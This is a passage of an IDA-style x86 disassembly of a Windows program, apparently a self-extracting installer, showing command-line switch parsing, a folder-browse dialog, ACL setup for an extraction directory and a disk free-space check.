push lDistanceToMove ; lDistanceToMove
push esi ; hFile
call ds:SetFilePointer ; SetFilePointer
mov eax, esi
pop esi
retn
sub_1001F1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1001F5A(HANDLE hFile, LPVOID lpBuffer, DWORD NumberOfBytesRead)
sub_1001F5A proc near ; CODE XREF: start_0+178�p
; DATA XREF: start_0+1D5�o
hFile = dword ptr 8
lpBuffer = dword ptr 0Ch
NumberOfBytesRead= dword ptr 10h
push ebp
mov ebp, esp
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push [ebp+NumberOfBytesRead] ; nNumberOfBytesToRead
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hFile] ; hFile
call ds:ReadFile ; ReadFile
test eax, eax
jnz short loc_1001F7D
push 0FFFFFFFFh ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1001F7D: ; CODE XREF: sub_1001F5A+1A�j
mov eax, [ebp+NumberOfBytesRead]
pop ebp
retn
sub_1001F5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1001F82(HANDLE hFile, LPCVOID lpBuffer, DWORD NumberOfBytesWritten)
sub_1001F82 proc near ; DATA XREF: start_0+1D0�o
hFile = dword ptr 8
lpBuffer = dword ptr 0Ch
NumberOfBytesWritten= dword ptr 10h
push ebp
mov ebp, esp
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push [ebp+NumberOfBytesWritten] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hFile] ; hFile
call ds:WriteFile ; WriteFile
test eax, eax
jnz short loc_1001FA5
push 0FFFFFFFFh ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1001FA5: ; CODE XREF: sub_1001F82+1A�j
mov eax, [ebp+NumberOfBytesWritten]
pop ebp
retn
sub_1001F82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1001FAA(PSID *TokenHandle, int, int)
sub_1001FAA proc near ; CODE XREF: sub_100269E+66�p
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -0Ch
ReturnLength = dword ptr -4
TokenHandle = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push [ebp+TokenHandle] ; pSid
and [ebp+pIdentifierAuthority.Value], 0
and [ebp+pIdentifierAuthority.Value+1], 0
and [ebp+pIdentifierAuthority.Value+2], 0
and [ebp+pIdentifierAuthority.Value+3], 0
and [ebp+pIdentifierAuthority.Value+4], 0
xor edi, edi
push edi ; nSubAuthority7
push edi ; nSubAuthority6
push edi ; nSubAuthority5
push edi ; nSubAuthority4
push edi ; nSubAuthority3
push edi ; nSubAuthority2
push 220h ; nSubAuthority1
push 20h ; nSubAuthority0
push 2 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
mov [ebp+pIdentifierAuthority.Value+5], 5
call ds:AllocateAndInitializeSid ; AllocateAndInitializeSid
test eax, eax
jz short loc_1002002
lea eax, [ebp+TokenHandle]
push eax ; TokenHandle
push 28h ; DesiredAccess
call ds:GetCurrentProcess ; GetCurrentProcess
push eax ; ProcessHandle
call ds:OpenProcessToken ; OpenProcessToken
test eax, eax
jnz short loc_1002009
loc_1002002: ; CODE XREF: sub_1001FAA+3F�j
xor eax, eax
jmp loc_10020C2
; ---------------------------------------------------------------------------
loc_1002009: ; CODE XREF: sub_1001FAA+56�j
push ebx
mov ebx, ds:GetTokenInformation
push esi
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push 10000h ; TokenInformationLength
push offset pSid ; TokenInformation
push 4 ; TokenInformationClass
push [ebp+TokenHandle] ; TokenHandle
call ebx ; GetTokenInformation
test eax, eax
jnz short loc_1002031
loc_100202A: ; CODE XREF: sub_1001FAA+D4�j
xor eax, eax
jmp loc_10020C0
; ---------------------------------------------------------------------------
loc_1002031: ; CODE XREF: sub_1001FAA+7E�j
push pSid ; pSid
call ds:GetLengthSid ; GetLengthSid
mov esi, eax
push esi ; dwBytes
call sub_1001EFD
cmp eax, edi
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_100209E
mov ecx, esi
mov esi, pSid
mov edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push 10000h ; TokenInformationLength
push offset pSid ; TokenInformation
and ecx, 3
push 1 ; TokenInformationClass
rep movsb
push [ebp+TokenHandle] ; TokenHandle
call ebx ; GetTokenInformation
test eax, eax
jz short loc_100202A
push pSid ; pSid
call ds:GetLengthSid ; GetLengthSid
mov esi, eax
push esi ; dwBytes
call sub_1001EFD
test eax, eax
pop ecx
mov ecx, [ebp+arg_8]
mov [ecx], eax
jnz short loc_10020A5
loc_100209E: ; CODE XREF: sub_1001FAA+A3�j
push 8 ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_10020A5: ; CODE XREF: sub_1001FAA+F2�j
mov ecx, esi
mov esi, pSid
mov edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
xor eax, eax
rep movsb
inc eax
loc_10020C0: ; CODE XREF: sub_1001FAA+82�j
pop esi
pop ebx
loc_10020C2: ; CODE XREF: sub_1001FAA+5A�j
pop edi
leave
retn 0Ch
sub_1001FAA endp
; =============== S U B R O U T I N E =======================================
sub_10020C7 proc near ; CODE XREF: DialogFunc+FE�p
; sub_1002272+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
lea ecx, [eax+1]
loc_10020CE: ; CODE XREF: sub_10020C7+C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_10020CE
push esi
sub eax, ecx
lea esi, [eax+1]
push edi
push esi ; dwBytes
call sub_1001EFD
pop ecx
mov ecx, esi
mov esi, [esp+8+arg_0]
mov edx, ecx
shr ecx, 2
mov edi, eax
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
retn 4
sub_10020C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; INT_PTR __stdcall DialogFunc(HWND, UINT, WPARAM, LPARAM)
DialogFunc proc near ; DATA XREF: sub_100269E+3A9�o
Buffer = byte ptr -228h
lParam = byte ptr -124h
bi = _browseinfoA ptr -20h
hDlg = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
sub esp, 228h
mov eax, [ebp+arg_4]
sub eax, 10h
push ebx
push esi
jz loc_100225E
sub eax, 100h
jz loc_1002204
dec eax
jnz short loc_100213A
movzx eax, [ebp+arg_8]
dec eax
jz loc_10021D5
dec eax
jz loc_100225E
sub eax, 6Bh
jz short loc_1002141
loc_100213A: ; CODE XREF: DialogFunc+23�j
xor eax, eax
jmp loc_100226C
; ---------------------------------------------------------------------------
loc_1002141: ; CODE XREF: DialogFunc+3A�j
push edi
push 104h ; cchBufferMax
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 20000005h ; uID
push hInstance ; hInstance
xor ebx, ebx
mov [ebp+lParam], bl
call ds:LoadStringA ; LoadStringA
mov esi, [ebp+hDlg]
push 8
xor eax, eax
pop ecx
lea edi, [ebp+bi]
rep stosd
lea eax, [ebp+lParam]
mov [ebp+bi.pszDisplayName], eax
lea eax, [ebp+Buffer]
mov [ebp+bi.lpszTitle], eax
xor edi, edi
lea eax, [ebp+bi]
inc edi
push eax ; lpbi
mov [ebp+bi.hwndOwner], esi
mov [ebp+bi.ulFlags], edi
call ds:SHBrowseForFolderA ; SHBrowseForFolderA
cmp eax, ebx
jz short loc_10021C2
lea ecx, [ebp+lParam]
push ecx ; pszPath
push eax ; pidl
call ds:SHGetPathFromIDListA ; SHGetPathFromIDListA
test eax, eax
jz short loc_10021C2
lea eax, [ebp+lParam]
push eax ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 6Ch ; nIDDlgItem
push esi ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_10021C2: ; CODE XREF: DialogFunc+9D�j
; DialogFunc+AF�j
push ebx ; lParam
push ebx ; wParam
push 28h ; Msg
push esi ; hWnd
call ds:SendMessageA ; SendMessageA
mov eax, edi
pop edi
jmp loc_100226C
; ---------------------------------------------------------------------------
loc_10021D5: ; CODE XREF: DialogFunc+2A�j
and [ebp+lParam], 0
lea eax, [ebp+lParam]
push eax ; lParam
push 104h ; wParam
push 0Dh ; Msg
push 6Ch ; nIDDlgItem
push [ebp+hDlg] ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
lea eax, [ebp+lParam]
push eax
call sub_10020C7
push eax
jmp short loc_1002260
; ---------------------------------------------------------------------------
loc_1002204: ; CODE XREF: DialogFunc+1C�j
push 104h ; cchBufferMax
lea eax, [ebp+lParam]
push eax ; lpBuffer
push 20000005h ; uID
push hInstance ; hInstance
call ds:LoadStringA ; LoadStringA
lea eax, [ebp+lParam]
push eax ; lParam
xor ebx, ebx
push ebx ; wParam
push 0Ch ; Msg
push [ebp+hDlg] ; hWnd
call ds:SendMessageA ; SendMessageA
mov esi, ds:SendDlgItemMessageA
lea eax, [ebp+lParam]
push eax ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 67h ; nIDDlgItem
push [ebp+hDlg] ; hDlg
call esi ; SendDlgItemMessageA
push offset Buffer ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 6Ch ; nIDDlgItem
push [ebp+hDlg] ; hDlg
call esi ; SendDlgItemMessageA
jmp short loc_1002269
; ---------------------------------------------------------------------------
loc_100225E: ; CODE XREF: DialogFunc+11�j
; DialogFunc+31�j
push 0 ; nResult
loc_1002260: ; CODE XREF: DialogFunc+104�j
push [ebp+hDlg] ; hDlg
call ds:EndDialog ; EndDialog
loc_1002269: ; CODE XREF: DialogFunc+15E�j
xor eax, eax
inc eax
loc_100226C: ; CODE XREF: DialogFunc+3E�j
; DialogFunc+D2�j
pop esi
pop ebx
leave
retn 10h
DialogFunc endp
; =============== S U B R O U T I N E =======================================
sub_1002272 proc near ; CODE XREF: start_0+46�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 10h
push ebx
push ebp
push esi
push edi
push 104h ; nSize
mov esi, offset NumberOfBytesRead
push esi ; lpFilename
xor ebx, ebx
push ebx ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
mov eax, esi
lea ecx, [eax+1]
loc_1002292: ; CODE XREF: sub_1002272+25�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_1002292
sub eax, ecx
lea eax, NumberOfBytesRead[eax]
jmp short loc_10022AD
; ---------------------------------------------------------------------------
loc_10022A3: ; CODE XREF: sub_1002272+3D�j
lea ecx, [eax-1]
cmp byte ptr [ecx], 5Ch
jz short loc_10022B1
mov eax, ecx
loc_10022AD: ; CODE XREF: sub_1002272+2F�j
cmp eax, esi
ja short loc_10022A3
loc_10022B1: ; CODE XREF: sub_1002272+37�j
push eax
call sub_10020C7
push esi ; NumberOfBytesRead
mov lParam, eax
call sub_100180D
call ds:GetCommandLineA ; GetCommandLineA
mov ebp, eax
mov [esp+20h+var_8], ebp
xor ecx, ecx
loc_10022D0: ; CODE XREF: sub_1002272+75�j
mov al, [ebp+0]
cmp al, 20h
jz short loc_10022DF
cmp al, 9
jz short loc_10022DF
cmp al, 22h
jnz short loc_10022E9
loc_10022DF: ; CODE XREF: sub_1002272+63�j
; sub_1002272+67�j
cmp al, 22h
jnz short loc_10022E6
xor ecx, ecx
inc ecx
loc_10022E6: ; CODE XREF: sub_1002272+6F�j
inc ebp
jmp short loc_10022D0
; ---------------------------------------------------------------------------
loc_10022E9: ; CODE XREF: sub_1002272+6B�j
cmp ecx, ebx
mov [esp+20h+var_8], ebp
jz short loc_1002307
cmp [ebp+0], bl
mov eax, ebp
jz short loc_1002307
loc_10022F8: ; CODE XREF: sub_1002272+8E�j
cmp byte ptr [eax], 22h
jz short loc_1002304
inc eax
cmp [eax], bl
jnz short loc_10022F8
jmp short loc_1002307
; ---------------------------------------------------------------------------
loc_1002304: ; CODE XREF: sub_1002272+89�j
mov byte ptr [eax], 20h
loc_1002307: ; CODE XREF: sub_1002272+7D�j
; sub_1002272+84�j ...
mov eax, ebp
lea ecx, [eax+1]
loc_100230C: ; CODE XREF: sub_1002272+9F�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_100230C
sub eax, ecx
lea eax, [eax+ebp-1]
jmp short loc_100232A
; ---------------------------------------------------------------------------
loc_100231B: ; CODE XREF: sub_1002272+BA�j
mov cl, [eax]
cmp cl, 20h
jz short loc_1002327
cmp cl, 9
jnz short loc_100232E
loc_1002327: ; CODE XREF: sub_1002272+AE�j
mov [eax], bl
dec eax
loc_100232A: ; CODE XREF: sub_1002272+A7�j
cmp eax, ebp
jnb short loc_100231B
loc_100232E: ; CODE XREF: sub_1002272+B3�j
mov ecx, lParam
mov eax, ecx
mov [esp+20h+var_10], ebx
mov byte ptr Caption, bl
lea esi, [eax+1]
loc_1002343: ; CODE XREF: sub_1002272+D6�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_1002343
sub eax, esi
lea edx, [eax+ecx-1]
jmp short loc_1002358
; ---------------------------------------------------------------------------
loc_1002352: ; CODE XREF: sub_1002272+E8�j
cmp byte ptr [edx], 2Eh
jz short loc_100235E
dec edx
loc_1002358: ; CODE XREF: sub_1002272+DE�j
cmp edx, ecx
ja short loc_1002352
jmp short loc_1002390
; ---------------------------------------------------------------------------
loc_100235E: ; CODE XREF: sub_1002272+E3�j
mov eax, edx
lea esi, [eax+1]
loc_1002363: ; CODE XREF: sub_1002272+F6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_1002363
sub eax, esi
lea ecx, [eax+1]
mov [esp+20h+var_10], eax
mov eax, ecx
shr ecx, 2
mov esi, edx
mov edi, offset Caption
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov [edx], bl
mov ecx, lParam
loc_1002390: ; CODE XREF: sub_1002272+EA�j
mov dword_100702C, offset dword_100119C
cmp [ebp+0], bl
mov esi, ebp
jmp loc_10024A7
; ---------------------------------------------------------------------------
loc_10023A4: ; CODE XREF: sub_1002272+239�j
mov al, [esi]
mov dl, [ecx]
or al, 20h
or dl, 20h
cmp al, dl
jnz loc_10024A0
lea ebp, [esi+1]
lea esi, [ecx+1]
jmp short loc_10023C5
; ---------------------------------------------------------------------------
loc_10023BD: ; CODE XREF: sub_1002272+162�j
xor ebx, ebx
cmp al, bl
jz short loc_10023E0
inc ebp
inc esi
loc_10023C5: ; CODE XREF: sub_1002272+149�j
mov al, [esi]
mov dl, [ebp+0]
mov bl, al
or dl, 20h
or bl, 20h
cmp bl, dl
jz short loc_10023BD
xor ebx, ebx
cmp al, bl
jnz loc_10024A0
loc_10023E0: ; CODE XREF: sub_1002272+14F�j
cmp byte ptr [ebp+0], 2Eh
mov [esp+20h+var_C], ebx
jnz short loc_100242D
cmp [esp+20h+var_10], ebx
jbe short loc_100242D
xor edi, edi
cmp [esp+20h+var_10], ebx
mov [esp+20h+var_C], 1
jbe short loc_1002429
mov eax, ebp
sub eax, offset Caption
loc_1002407: ; CODE XREF: sub_1002272+1B3�j
lea esi, Caption[edi]
mov dl, [eax+esi]
mov bl, [esi]
or dl, 20h
or bl, 20h
cmp dl, bl
jnz loc_10024B3
inc edi
cmp edi, [esp+20h+var_10]
jb short loc_1002407
xor ebx, ebx
loc_1002429: ; CODE XREF: sub_1002272+18C�j
add ebp, [esp+20h+var_10]
loc_100242D: ; CODE XREF: sub_1002272+176�j
; sub_1002272+17C�j ...
mov al, [ebp+0]
cmp al, 20h
jz short loc_100243C
cmp al, 9
jz short loc_100243C
cmp al, bl
jnz short loc_10024A0
loc_100243C: ; CODE XREF: sub_1002272+1C0�j
; sub_1002272+1C4�j
mov esi, [esp+20h+var_8]
mov eax, ebp
sub eax, esi
mov ecx, eax
mov ebx, ecx
shr ecx, 2
mov edx, offset FileName
mov edi, edx
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
xor ebx, ebx
cmp [esp+20h+var_C], ebx
lea edi, FileName[eax]
mov [edi], bl
jnz short loc_100248F
mov ecx, [esp+20h+var_10]
mov ebx, ecx
shr ecx, 2
mov esi, offset Caption
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, [esp+20h+var_10]
xor ebx, ebx
mov byte ptr FileName[eax+ecx], bl
loc_100248F: ; CODE XREF: sub_1002272+1F7�j
push edx ; lpFileName
call ds:GetFileAttributesA ; GetFileAttributesA
test al, 10h
jz short loc_10024BE
mov ecx, lParam
loc_10024A0: ; CODE XREF: sub_1002272+13D�j
; sub_1002272+168�j ...
mov esi, [esp+20h+var_4]
inc esi
cmp [esi], bl
loc_10024A7: ; CODE XREF: sub_1002272+12D�j
mov [esp+20h+var_4], esi
jnz loc_10023A4
jmp short loc_10024C4
; ---------------------------------------------------------------------------
loc_10024B3: ; CODE XREF: sub_1002272+1A8�j
xor ebx, ebx
mov [esp+20h+var_C], ebx
jmp loc_100242D
; ---------------------------------------------------------------------------
loc_10024BE: ; CODE XREF: sub_1002272+226�j
mov dword_100702C, ebp
loc_10024C4: ; CODE XREF: sub_1002272+23F�j
mov ebp, dword_100702C
mov eax, ebp
lea edx, [eax+1]
loc_10024CF: ; CODE XREF: sub_1002272+262�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_10024CF
sub eax, edx
cmp eax, 3
jb loc_1002561
lea edi, [eax-2]
jmp short loc_100255D
; ---------------------------------------------------------------------------
loc_10024E6: ; CODE XREF: sub_1002272+2ED�j
mov esi, [ebp+0]
and esi, 0FFDFFDFFh
xor eax, eax
or esi, 20000000h
inc eax
cmp esi, 20582D20h
jnz short loc_1002505
mov dword_1007030, eax
loc_1002505: ; CODE XREF: sub_1002272+28C�j
cmp esi, 3A582D20h
jnz short loc_1002522
mov dword_1007030, eax
lea eax, [ebp+4]
push eax
call sub_1001746
test eax, eax
jz short loc_1002569
xor eax, eax
inc eax
loc_1002522: ; CODE XREF: sub_1002272+299�j
cmp esi, 20552D20h
jnz short loc_100252F
mov dword_1017C20, eax
loc_100252F: ; CODE XREF: sub_1002272+2B6�j
cmp esi, 20512D20h
jnz short loc_1002541
mov dword_1007038, eax
mov dword_1017C20, eax
loc_1002541: ; CODE XREF: sub_1002272+2C3�j
cmp esi, 20532D20h
jnz short loc_100254E
mov dword_1007768, eax
loc_100254E: ; CODE XREF: sub_1002272+2D5�j
cmp esi, 3A532D20h
jnz short loc_100255B
mov dword_1007768, eax
loc_100255B: ; CODE XREF: sub_1002272+2E2�j
dec edi
inc ebp
loc_100255D: ; CODE XREF: sub_1002272+272�j
cmp edi, ebx
ja short loc_10024E6
loc_1002561: ; CODE XREF: sub_1002272+269�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn
; ---------------------------------------------------------------------------
loc_1002569: ; CODE XREF: sub_1002272+2AB�j
push 52h ; dwMessageId
call sub_1001CB9
sub_1002272 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
sub_1002571 proc near ; CODE XREF: sub_1002596+36�p
; sub_1002AE1+1CE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 8 ; dwBytes
call sub_1001EFD
pop ecx
push [esp+4+arg_4]
mov esi, eax
call sub_10020C7
mov [esi+4], eax
mov eax, [esp+4+arg_0]
mov ecx, [eax]
mov [esi], ecx
mov [eax], esi
pop esi
retn 8
sub_1002571 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1002596(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes, int)
sub_1002596 proc near ; CODE XREF: sub_10025EA+56�p
; sub_1002AE1+19D�p
lpPathName = dword ptr 8
lpSecurityAttributes= dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_8], eax
push esi
setz al
push edi
mov edi, [ebp+lpPathName]
cmp byte ptr [edi], 0
mov esi, edi
mov [ebp+lpPathName], eax
jz short loc_10025E1
loc_10025B0: ; CODE XREF: sub_1002596+49�j
cmp byte ptr [esi], 5Ch
jnz short loc_10025DB
push [ebp+lpSecurityAttributes] ; lpSecurityAttributes
and byte ptr [esi], 0
push edi ; lpPathName
call ds:CreateDirectoryA ; CreateDirectoryA
test eax, eax
jz short loc_10025D8
push edi
push offset off_1007008
call sub_1002571
mov [ebp+lpPathName], 1
loc_10025D8: ; CODE XREF: sub_1002596+2E�j
mov byte ptr [esi], 5Ch
loc_10025DB: ; CODE XREF: sub_1002596+1D�j
inc esi
cmp byte ptr [esi], 0
jnz short loc_10025B0
loc_10025E1: ; CODE XREF: sub_1002596+18�j
mov eax, [ebp+lpPathName]
pop edi
pop esi
pop ebp
retn 0Ch
sub_1002596 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10025EA(int, LPSECURITY_ATTRIBUTES lpSecurityAttributes, int)
sub_10025EA proc near ; CODE XREF: sub_100269E+47�p
; sub_100269E+2DD�p ...
PathName = byte ptr -104h
arg_0 = dword ptr 8
lpSecurityAttributes= dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push esi
mov esi, [ebp+arg_0]
mov eax, esi
push edi
lea edx, [eax+1]
loc_10025FD: ; CODE XREF: sub_10025EA+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_10025FD
sub eax, edx
lea ecx, [eax+1]
mov edx, ecx
shr ecx, 2
lea edi, [ebp+PathName]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
lea eax, [ebp+eax+PathName]
cmp byte ptr [eax-1], 5Ch
pop edi
pop esi
jz short loc_1002633
mov byte ptr [eax], 5Ch
and byte ptr [eax+1], 0
loc_1002633: ; CODE XREF: sub_10025EA+40�j
push [ebp+arg_8] ; int
lea eax, [ebp+PathName]
push [ebp+lpSecurityAttributes] ; lpSecurityAttributes
push eax ; lpPathName
call sub_1002596
test eax, eax
jz short loc_1002698
lea eax, [ebp+PathName]
push eax ; lpFileName
call ds:GetFileAttributesA ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_1002698
test al, 10h
jz short loc_1002698
push offset LibFileName ; "advapi32.dll"
call ds:LoadLibraryA ; LoadLibraryA
test eax, eax
jz short loc_1002693
push offset aDecryptfilea ; "DecryptFileA"
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
test eax, eax
jz short loc_1002693
push 0
lea ecx, [ebp+PathName]
push ecx
call eax
test eax, eax
jnz short loc_1002693
call ds:GetLastError
loc_1002693: ; CODE XREF: sub_10025EA+82�j
; sub_10025EA+92�j ...
xor eax, eax
inc eax
jmp short locret_100269A
; ---------------------------------------------------------------------------
loc_1002698: ; CODE XREF: sub_10025EA+5D�j
; sub_10025EA+6F�j ...
xor eax, eax
locret_100269A: ; CODE XREF: sub_10025EA+AC�j
leave
retn 0Ch
sub_10025EA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_100269E proc near ; CODE XREF: start_0:loc_1002EFC�p
Str = byte ptr -59Ch
pAcl = ACL ptr -19Ch
pbBuffer = byte ptr -9Ch
SystemTime = _SYSTEMTIME ptr -7Ch
pSecurityDescriptor= byte ptr -6Ch
TotalNumberOfClusters= dword ptr -58h
FileTime = _FILETIME ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
TokenHandle = dword ptr -40h
NumberOfFreeClusters= dword ptr -3Ch
SectorsPerCluster= dword ptr -38h
BytesPerSector = dword ptr -34h
hProv = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
lpSecurityAttributes= dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
DeviceName = byte ptr -10h
var_9 = byte ptr -9
Source = byte ptr -8
var_1 = byte ptr -1
push ebp
lea ebp, [esp-78h]
sub esp, 59Ch
push ebx
push edi
xor edi, edi
cmp byte ptr Buffer, 0
lea eax, [ebp+78h+pSecurityDescriptor]
mov dword ptr [ebp+78h+Source], 5C3A63h
mov [ebp+78h+var_1], 63h
mov [ebp+78h+var_1C], edi
mov [ebp+78h+var_18], edi
mov [ebp+78h+var_14], edi
mov [ebp+78h+var_4C], 0Ch
mov [ebp+78h+var_48], eax
mov [ebp+78h+var_44], edi
mov [ebp+78h+lpSecurityAttributes], edi
mov ebx, offset Buffer
jz short loc_10026F8
push edi ; int
push edi ; lpSecurityAttributes
push ebx ; int
call sub_10025EA
test eax, eax
jnz loc_1002ADA
and byte ptr Buffer, al
loc_10026F8: ; CODE XREF: sub_100269E+42�j
lea eax, [ebp+78h+DeviceName]
push eax ; int
lea eax, [ebp+78h+var_24]
push eax ; int
lea eax, [ebp+78h+TokenHandle]
push eax ; TokenHandle
call sub_1001FAA
test eax, eax
jnz short loc_1002714
loc_100270D: ; CODE XREF: sub_100269E+3C5�j
push 0FFFFFFFFh
jmp loc_1002AD4
; ---------------------------------------------------------------------------
loc_1002714: ; CODE XREF: sub_100269E+6D�j
push esi
push 1 ; dwRevision
lea eax, [ebp+78h+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:InitializeSecurityDescriptor ; InitializeSecurityDescriptor
test eax, eax
jz short loc_10027A2
push 2 ; dwAclRevision
push 100h ; nAclLength
lea eax, [ebp+78h+pAcl]
push eax ; pAcl
call ds:InitializeAcl ; InitializeAcl
test eax, eax
jz short loc_10027A2
push [ebp+78h+TokenHandle] ; pSid
mov esi, ds:AddAccessAllowedAce
mov edi, 10000000h
push edi ; AccessMask
push 2 ; dwAceRevision
lea eax, [ebp+78h+pAcl]
push eax ; pAcl
call esi ; AddAccessAllowedAce
test eax, eax
jz short loc_10027A0
push [ebp+78h+var_24] ; pSid
lea eax, [ebp+78h+pAcl]
push edi ; AccessMask
push 2 ; dwAceRevision
push eax ; pAcl
call esi ; AddAccessAllowedAce
test eax, eax
jz short loc_10027A0
push dword ptr [ebp+78h+DeviceName] ; pSid
lea eax, [ebp+78h+pAcl]
push edi ; AccessMask
push 2 ; dwAceRevision
push eax ; pAcl
call esi ; AddAccessAllowedAce
test eax, eax
jz short loc_10027A0
push 0 ; bDaclDefaulted
lea eax, [ebp+78h+pAcl]
push eax ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+78h+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:SetSecurityDescriptorDacl ; SetSecurityDescriptorDacl
test eax, eax
jz short loc_10027A0
lea eax, [ebp+78h+var_4C]
mov [ebp+78h+lpSecurityAttributes], eax
loc_10027A0: ; CODE XREF: sub_100269E+BB�j
; sub_100269E+CE�j ...
xor edi, edi
loc_10027A2: ; CODE XREF: sub_100269E+85�j
; sub_100269E+9D�j
cmp dword_1017C20, edi
jnz short loc_10027C3
cmp dword_1007030, edi
jz short loc_10027C3
loc_10027B2: ; CODE XREF: sub_100269E+376�j
push ebx ; lpBuffer
push 104h ; nBufferLength
call ds:GetCurrentDirectoryA ; GetCurrentDirectoryA
jmp loc_1002A1C
; ---------------------------------------------------------------------------
loc_10027C3: ; CODE XREF: sub_100269E+10A�j
; sub_100269E+112�j
push 0FFFFh ; uSize
push offset pSid ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
mov al, byte ptr pSid
or al, 20h
mov [ebp+78h+var_9], al
mov [ebp+78h+var_2C], edi
mov [ebp+78h+var_28], edi
mov [ebp+78h+Source], 61h
loc_10027E7: ; CODE XREF: sub_100269E+206�j
lea eax, [ebp+78h+Source]
push eax ; lpRootPathName
call ds:GetDriveTypeA ; GetDriveTypeA
mov esi, eax
push 2 ; Count
lea eax, [ebp+78h+Source]
push eax ; Source
lea eax, [ebp+78h+DeviceName]
push eax ; Dest
call ds:strncpy ; strncpy
and [ebp+78h+DeviceName+2], 0
add esp, 0Ch
push 400h ; ucchMax
lea eax, [ebp+78h+Str]
push eax ; lpTargetPath
lea eax, [ebp+78h+DeviceName]
push eax ; lpDeviceName
call ds:QueryDosDeviceA ; QueryDosDeviceA
cmp esi, 3
jz short loc_100282A
cmp esi, 6
jnz short loc_100289D
loc_100282A: ; CODE XREF: sub_100269E+185�j
cmp eax, edi
jz short loc_100289D
lea eax, [ebp+78h+Str]
push offset SubStr ; "backofficestorage"
push eax ; Str
call ds:_strlwr ; _strlwr
pop ecx
push eax ; Str
call ds:strstr ; strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_100289D
lea eax, [ebp+78h+TotalNumberOfClusters]
push eax ; lpTotalNumberOfClusters
lea eax, [ebp+78h+NumberOfFreeClusters]
push eax ; lpNumberOfFreeClusters
lea eax, [ebp+78h+BytesPerSector]
push eax ; lpBytesPerSector
lea eax, [ebp+78h+SectorsPerCluster]
push eax ; lpSectorsPerCluster
lea eax, [ebp+78h+Source]
push eax ; lpRootPathName
call ds:GetDiskFreeSpaceA ; GetDiskFreeSpaceA
test eax, eax
jz short loc_100289D
mov eax, [ebp+78h+SectorsPerCluster]
imul eax, [ebp+78h+BytesPerSector]
mul [ebp+78h+NumberOfFreeClusters]
mov cl, [ebp+78h+Source]
cmp cl, [ebp+78h+var_9]
mov esi, edx
jnz short loc_1002888
mov [ebp+78h+var_2C], eax
mov [ebp+78h+var_28], esi
jmp short loc_100289D
